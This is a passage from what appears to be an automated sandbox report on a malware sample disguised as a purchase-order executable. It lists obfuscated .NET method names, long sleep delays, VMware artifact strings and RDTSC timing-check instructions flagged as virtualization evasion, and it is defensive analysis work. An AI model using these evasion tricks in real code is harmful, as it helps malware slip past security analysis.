          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2D89 push ebp; iretd 4_2_02DA2D8A
          Source: Purchase Order#23113.exeStatic PE information: section name: .text entropy: 7.961859461470405
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, iqTvldCFjYxVEjUVoAn.csHigh entropy of concatenated method names: 'yjx0LI8LdB', 'cmD02e5nId', 'bSu0443KKc', 'EWL0Uk45FU', 'ybF0cuuuR3', 'drF0SPNDET', 'cAw07sZBZX', 'tZO03FjSRT', 'yL90HXSIQh', 'vJg0FEnyIG'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, FshelGAQxGvPhtTNBd.csHigh entropy of concatenated method names: 'oU693Ly0vr', 'mnE9HyKWio', 'AT49fqwX5o', 'Grl9msDv0S', 'oeX9K7lpkS', 'z6O9j0mQcJ', 'kiR9XWlT9F', 'Brd9wX6c92', 'ypH9VYaJQ7', 'pfZ9tIFcs1'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, wo0DO8K3opYFDvvKQr.csHigh entropy of concatenated method names: 'zGckLvHfgB', 'rhPk2SUKXa', 'NnMk4eFNae', 'SKFkUW3QiH', 'tHkkcyoB1g', 'pqokSqxjj7', 'ECMk7kVEAk', 'yx6k3F1Tvc', 'b7qkHHpZ0A', 'uD7kFwZ0UB'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, IFkXatnFqtCMlE8Gj7.csHigh entropy of concatenated method names: 'XqhZaTkG0l', 'ydaZl13PI9', 'oCEgQjHhd7', 'WefgWUNS8F', 'A9JZtF6bqO', 'y4DZb38Ygj', 'zCiZeDtwVa', 'DZYZphE1G1', 'JYMZoNBc8M', 'lM3Zh9ZQme'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, X8ZF8EWvN6woD75nbB.csHigh entropy of concatenated method names: 'AJe4bYr9t', 'PyTU2heiY', 'FfLS91a5M', 'HWF7Rn1ta', 'cgbHUWZYe', 'ugAFQtnrR', 'A01y5HtluWTm7itYQt', 'nj7M0F9R9EUdlSBpPG', 'TwFgEBDmI', 'ATYu8QdKy'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, GIZY3Sk919NyGqA32m.csHigh entropy of concatenated method names: 'DcC0Wo9JED', 'XW706u7wJd', 'KBV0NEShG2', 'wyS0imob17', 'JBT0P6JUbR', 'Gpq0DecX6S', 'Njx0dY1EOM', 'UwAgIRJTsN', 'YD0gaUoaD6', 'O64gYZv2qJ'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, XP6pmizMgq1mbPSQZp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nHC09eNXAp', 'TRl0GARaFn', 'PId0rcNpdB', 'oPM0ZinDJS', 'urd0gHIuJT', 'AOm006eR5E', 'nyi0uXB3ca'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, rVZ8SCBXbjtLcaZhD0.csHigh entropy of concatenated method names: 'LpmvUO0Ux1', 'hS3vS6UnnB', 'FXFv3ak6YG', 'ta2vHulk9f', 'yI6vGpmNGs', 'Sc8vrEimhp', 'ujxvZkgOFm', 'J5lvgVQLiy', 't9kv0b9eYG', 'dinvu1XhtV'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, Tw9YGNCWAd2JfSc9aMJ.csHigh entropy of concatenated method names: 'QTZuLfZcOj', 'sGTu2VvM7o', 'ioru4pOiEL', 'rL1ZpnQJQ5yAjS1JG5e', 'LA1hSqQEjGpKp6PVBnM', 'X69HRwQtu6H2dDAwWX9', 'wCWuAGQ9ILIr7NKmIih', 'EKsFcSQHPnXHI1BgyYk'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, lIDZBrdERDDgYaKjKV.csHigh entropy of concatenated method names: 'CQJPp2GPuW', 'Xu1PoCChpl', 'YPCPhC7Ey5', 'svAPyYCcVk', 'eh6PAHG5x2', 'ExKPE9EAFV', 'WSQPIx60sm', 'UQyPa7Ds5E', 'K0WPYgUgrr', 'TJDPl6ICns'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, exGrEiwILuYPOBrs5B.csHigh entropy of concatenated method names: 'xKCWkMMmmV', 'YFfWns5gVT', 'c23WOF1COn', 'B8oWRRNXTf', 'UjFWGyHSOr', 'L6cWrnN44y', 'b4iIBRI9W1ylghQM6I', 'EMgtYs7JqmBaoXykaN', 'UbvWWXyI8P', 'zLoW6dhQSV'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csHigh entropy of concatenated method names: 'es46s6LD0M', 'RlK6iOEH0T', 'Up36Pu2vrE', 'cpP6vfMWxG', 'fVl6DNPnJw', 'uTN6dl8sSg', 'Fd86kflPlQ', 'LUT6nZNYnZ', 'DF66J6k46P', 'V7S6ONWK15'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, e6TcNcO73YUgP0x7eF.csHigh entropy of concatenated method names: 'gyIdx7VKW5', 'qpfdL3CtVO', 'Vnfd4dEMo4', 'I3tdUV9CmX', 'dtgdSZBYqK', 'sR2d7jTKtX', 'zMedHS9wJi', 'xEsdFNO4uL', 'sPnslLx8YrTGZEVUXQa', 'XarTMJxh1SWHKaLgcnb'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, fG8AVHLWEfK002QLMr.csHigh entropy of concatenated method names: 'RnyGV05auI', 'dBhGbPfoIw', 'TN3GpkvroM', 'wqxGoKp3UT', 'rumGm0vjBF', 'FxRG1EejRF', 'sxCGKoabfb', 'JVJGjPbGJX', 'fjiGBnvP6y', 'jUpGXErYFv'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, JcnegiGYKoe4eoL2qp.csHigh entropy of concatenated method names: 'Dispose', 'gRwWYsucud', 'UmICmKvDN3', 'sp9TTLkPQH', 'v2SWlVNksO', 'eliWzMtoQZ', 'ProcessDialogKey', 'VyZCQY7y8Q', 'qUaCWLsjCK', 'BlrCCEjBd7'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, RTpikhsPr9aNE82lBB.csHigh entropy of concatenated method names: 'U5PdsXNogt', 'CvZdPg0KGE', 'BL5dDBU6QY', 'I8HdklFW4T', 'TZhdn63RHa', 'YOGDAecmxI', 'XsODEnv2Fa', 'qWtDI6oInu', 'uHFDahrTyw', 'Iq4DYWLiqX'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, uNj80byQGPRJSeu13E.csHigh entropy of concatenated method names: 'Y5xDc6JJtV', 'DaLD778hem', 'JVYv1RkDs3', 'juYvKkJPsG', 'boGvjOWlRg', 'U64vBZupsJ', 'aBIvXPuEmy', 'YDIvwQtwnn', 'XkZvqqsXSk', 'qe9vV3H8rk'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, tIdMEHCponeN05Au0wY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E81upnojhf', 'hZAuovuLCe', 'LdMuhW1k02', 'CWWuy6WNfP', 'McfuA8iykn', 'EOcuEuml27', 'RcVuI30wAF'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, zd1DyXe6YLd9YSr1fX.csHigh entropy of concatenated method names: 'ToString', 'lG3rtRN8O8', 'D6hrmExM74', 'b2tr1DnZEG', 'jCQrKtvf5Q', 'TWGrjmLwZ5', 'nLCrBA9GC9', 'WxhrXRwlXp', 'qjVrwjiAVH', 'bUorqmA3rH'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, lN6Ub0ZMlLsc2E8HvV.csHigh entropy of concatenated method names: 'tBJZOyhr1s', 'sKtZRlyZ6l', 'ToString', 'YbRZi8S8RD', 'InhZPhSo4e', 'BlyZvpwS4J', 'UETZD7HoOB', 'NDOZdsSVRo', 'Em8Zk3CbSX', 'uIjZnOn7a9'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, k11jmmDwAL2xE5G8Kt.csHigh entropy of concatenated method names: 'Oc0giqFYYY', 'EgHgPkght9', 'JLDgvZHmSn', 'ITLgD6Qe0B', 'PaagdKQxps', 'mrjgkiy8Ar', 'ipOgnJQTuV', 'NXbgJF9o9X', 'wqsgO6Os4b', 'fq2gRqdZKI'
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, x7QeJRTkHhJySLvqo8.csHigh entropy of concatenated method names: 'f9EgfoYjWy', 'D4GgmfV4qV', 'Mfag13J5MZ', 'w7bgKniQw1', 'jNmgprkLRK', 'FPSgjDh9CT', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, iqTvldCFjYxVEjUVoAn.csHigh entropy of concatenated method names: 'yjx0LI8LdB', 'cmD02e5nId', 'bSu0443KKc', 'EWL0Uk45FU', 'ybF0cuuuR3', 'drF0SPNDET', 'cAw07sZBZX', 'tZO03FjSRT', 'yL90HXSIQh', 'vJg0FEnyIG'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, FshelGAQxGvPhtTNBd.csHigh entropy of concatenated method names: 'oU693Ly0vr', 'mnE9HyKWio', 'AT49fqwX5o', 'Grl9msDv0S', 'oeX9K7lpkS', 'z6O9j0mQcJ', 'kiR9XWlT9F', 'Brd9wX6c92', 'ypH9VYaJQ7', 'pfZ9tIFcs1'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, wo0DO8K3opYFDvvKQr.csHigh entropy of concatenated method names: 'zGckLvHfgB', 'rhPk2SUKXa', 'NnMk4eFNae', 'SKFkUW3QiH', 'tHkkcyoB1g', 'pqokSqxjj7', 'ECMk7kVEAk', 'yx6k3F1Tvc', 'b7qkHHpZ0A', 'uD7kFwZ0UB'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, IFkXatnFqtCMlE8Gj7.csHigh entropy of concatenated method names: 'XqhZaTkG0l', 'ydaZl13PI9', 'oCEgQjHhd7', 'WefgWUNS8F', 'A9JZtF6bqO', 'y4DZb38Ygj', 'zCiZeDtwVa', 'DZYZphE1G1', 'JYMZoNBc8M', 'lM3Zh9ZQme'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, X8ZF8EWvN6woD75nbB.csHigh entropy of concatenated method names: 'AJe4bYr9t', 'PyTU2heiY', 'FfLS91a5M', 'HWF7Rn1ta', 'cgbHUWZYe', 'ugAFQtnrR', 'A01y5HtluWTm7itYQt', 'nj7M0F9R9EUdlSBpPG', 'TwFgEBDmI', 'ATYu8QdKy'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, GIZY3Sk919NyGqA32m.csHigh entropy of concatenated method names: 'DcC0Wo9JED', 'XW706u7wJd', 'KBV0NEShG2', 'wyS0imob17', 'JBT0P6JUbR', 'Gpq0DecX6S', 'Njx0dY1EOM', 'UwAgIRJTsN', 'YD0gaUoaD6', 'O64gYZv2qJ'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, XP6pmizMgq1mbPSQZp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nHC09eNXAp', 'TRl0GARaFn', 'PId0rcNpdB', 'oPM0ZinDJS', 'urd0gHIuJT', 'AOm006eR5E', 'nyi0uXB3ca'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, rVZ8SCBXbjtLcaZhD0.csHigh entropy of concatenated method names: 'LpmvUO0Ux1', 'hS3vS6UnnB', 'FXFv3ak6YG', 'ta2vHulk9f', 'yI6vGpmNGs', 'Sc8vrEimhp', 'ujxvZkgOFm', 'J5lvgVQLiy', 't9kv0b9eYG', 'dinvu1XhtV'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, Tw9YGNCWAd2JfSc9aMJ.csHigh entropy of concatenated method names: 'QTZuLfZcOj', 'sGTu2VvM7o', 'ioru4pOiEL', 'rL1ZpnQJQ5yAjS1JG5e', 'LA1hSqQEjGpKp6PVBnM', 'X69HRwQtu6H2dDAwWX9', 'wCWuAGQ9ILIr7NKmIih', 'EKsFcSQHPnXHI1BgyYk'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, lIDZBrdERDDgYaKjKV.csHigh entropy of concatenated method names: 'CQJPp2GPuW', 'Xu1PoCChpl', 'YPCPhC7Ey5', 'svAPyYCcVk', 'eh6PAHG5x2', 'ExKPE9EAFV', 'WSQPIx60sm', 'UQyPa7Ds5E', 'K0WPYgUgrr', 'TJDPl6ICns'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, exGrEiwILuYPOBrs5B.csHigh entropy of concatenated method names: 'xKCWkMMmmV', 'YFfWns5gVT', 'c23WOF1COn', 'B8oWRRNXTf', 'UjFWGyHSOr', 'L6cWrnN44y', 'b4iIBRI9W1ylghQM6I', 'EMgtYs7JqmBaoXykaN', 'UbvWWXyI8P', 'zLoW6dhQSV'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csHigh entropy of concatenated method names: 'es46s6LD0M', 'RlK6iOEH0T', 'Up36Pu2vrE', 'cpP6vfMWxG', 'fVl6DNPnJw', 'uTN6dl8sSg', 'Fd86kflPlQ', 'LUT6nZNYnZ', 'DF66J6k46P', 'V7S6ONWK15'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, e6TcNcO73YUgP0x7eF.csHigh entropy of concatenated method names: 'gyIdx7VKW5', 'qpfdL3CtVO', 'Vnfd4dEMo4', 'I3tdUV9CmX', 'dtgdSZBYqK', 'sR2d7jTKtX', 'zMedHS9wJi', 'xEsdFNO4uL', 'sPnslLx8YrTGZEVUXQa', 'XarTMJxh1SWHKaLgcnb'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, fG8AVHLWEfK002QLMr.csHigh entropy of concatenated method names: 'RnyGV05auI', 'dBhGbPfoIw', 'TN3GpkvroM', 'wqxGoKp3UT', 'rumGm0vjBF', 'FxRG1EejRF', 'sxCGKoabfb', 'JVJGjPbGJX', 'fjiGBnvP6y', 'jUpGXErYFv'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, JcnegiGYKoe4eoL2qp.csHigh entropy of concatenated method names: 'Dispose', 'gRwWYsucud', 'UmICmKvDN3', 'sp9TTLkPQH', 'v2SWlVNksO', 'eliWzMtoQZ', 'ProcessDialogKey', 'VyZCQY7y8Q', 'qUaCWLsjCK', 'BlrCCEjBd7'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, RTpikhsPr9aNE82lBB.csHigh entropy of concatenated method names: 'U5PdsXNogt', 'CvZdPg0KGE', 'BL5dDBU6QY', 'I8HdklFW4T', 'TZhdn63RHa', 'YOGDAecmxI', 'XsODEnv2Fa', 'qWtDI6oInu', 'uHFDahrTyw', 'Iq4DYWLiqX'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, uNj80byQGPRJSeu13E.csHigh entropy of concatenated method names: 'Y5xDc6JJtV', 'DaLD778hem', 'JVYv1RkDs3', 'juYvKkJPsG', 'boGvjOWlRg', 'U64vBZupsJ', 'aBIvXPuEmy', 'YDIvwQtwnn', 'XkZvqqsXSk', 'qe9vV3H8rk'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, tIdMEHCponeN05Au0wY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E81upnojhf', 'hZAuovuLCe', 'LdMuhW1k02', 'CWWuy6WNfP', 'McfuA8iykn', 'EOcuEuml27', 'RcVuI30wAF'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, zd1DyXe6YLd9YSr1fX.csHigh entropy of concatenated method names: 'ToString', 'lG3rtRN8O8', 'D6hrmExM74', 'b2tr1DnZEG', 'jCQrKtvf5Q', 'TWGrjmLwZ5', 'nLCrBA9GC9', 'WxhrXRwlXp', 'qjVrwjiAVH', 'bUorqmA3rH'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, lN6Ub0ZMlLsc2E8HvV.csHigh entropy of concatenated method names: 'tBJZOyhr1s', 'sKtZRlyZ6l', 'ToString', 'YbRZi8S8RD', 'InhZPhSo4e', 'BlyZvpwS4J', 'UETZD7HoOB', 'NDOZdsSVRo', 'Em8Zk3CbSX', 'uIjZnOn7a9'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, k11jmmDwAL2xE5G8Kt.csHigh entropy of concatenated method names: 'Oc0giqFYYY', 'EgHgPkght9', 'JLDgvZHmSn', 'ITLgD6Qe0B', 'PaagdKQxps', 'mrjgkiy8Ar', 'ipOgnJQTuV', 'NXbgJF9o9X', 'wqsgO6Os4b', 'fq2gRqdZKI'
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, x7QeJRTkHhJySLvqo8.csHigh entropy of concatenated method names: 'f9EgfoYjWy', 'D4GgmfV4qV', 'Mfag13J5MZ', 'w7bgKniQw1', 'jNmgprkLRK', 'FPSgjDh9CT', 'Next', 'Next', 'Next', 'NextBytes'
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTR
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 2DA9904 second address: 2DA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 2DA9B7E second address: 2DA9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 7C90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 8C90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 9E30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: A170000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: B170000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: A170000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: B170000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9579Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 353Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 4590Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 5382Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13908
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 1.3 %
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe TID: 6708Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3272Thread sleep count: 9579 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3272Thread sleep time: -19158000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3272Thread sleep count: 353 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3272Thread sleep time: -706000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728Thread sleep count: 4590 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728Thread sleep time: -9180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728Thread sleep count: 5382 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728Thread sleep time: -10764000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_00712674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,4_2_00712674
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.1778932144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1778932144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000000.1778932144.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
